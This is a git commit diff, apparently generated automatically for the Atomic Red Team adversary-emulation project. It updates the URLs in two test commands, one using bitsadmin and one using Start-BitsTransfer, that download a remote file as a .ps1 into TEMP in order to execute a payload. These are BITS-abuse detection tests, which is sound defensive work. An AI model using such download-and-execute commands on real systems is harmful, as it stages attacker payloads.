Generate docs from job=validate_atomics_generate_docs branch=bitsadmin-fix-cs

This commit is contained in:
CircleCI Atomic Red Team doc generator
2018-06-20 16:55:17 +00:00
parent 8ab08d5985
commit e7ff32080d
+2 -2
View File
@@ -42,7 +42,7 @@ and execute a payload
#### Run it with `command_prompt`!
```
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/59b33d16d7ace0bfb32d12fbcf166cc2a6dce129/atomics/T1197/T1197.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
```
<br/>
<br/>
@@ -56,6 +56,6 @@ and execute a payload leveraging PowerShell
#### Run it with `powershell`!
```
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/59b33d16d7ace0bfb32d12fbcf166cc2a6dce129/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
```
<br/>